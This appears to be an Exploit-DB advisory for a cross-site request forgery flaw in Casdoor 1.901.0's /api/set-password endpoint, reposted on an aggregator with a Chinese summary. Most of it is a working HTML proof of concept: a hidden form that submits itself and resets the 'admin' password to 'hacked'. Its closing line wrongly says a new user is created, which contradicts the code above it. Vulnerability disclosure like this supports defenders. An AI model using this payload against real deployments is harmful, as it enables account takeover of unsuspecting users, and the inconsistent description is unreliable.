[webapps] Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
Casdoor 1.901.0 存在跨站请求伪造(CSRF)漏洞,在 `/api/set-password` 端点允许攻击者通过构造 URL 任意更改用户密码。 2025-5-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:17 收藏
Casdoor 1.901.0 存在跨站请求伪造(CSRF)漏洞,在 `/api/set-password` 端点允许攻击者通过构造 URL 任意更改用户密码。 2025-5-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:17 收藏
# Exploit Title: Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: 1.901.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip
# Tested on: Windows
# CVE : N/A
Overview
==================================================
Casdoor v1.901.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built-in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built-in
userName: admin
newPassword: hacked
文章来源: https://www.exploit-db.com/exploits/52281
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh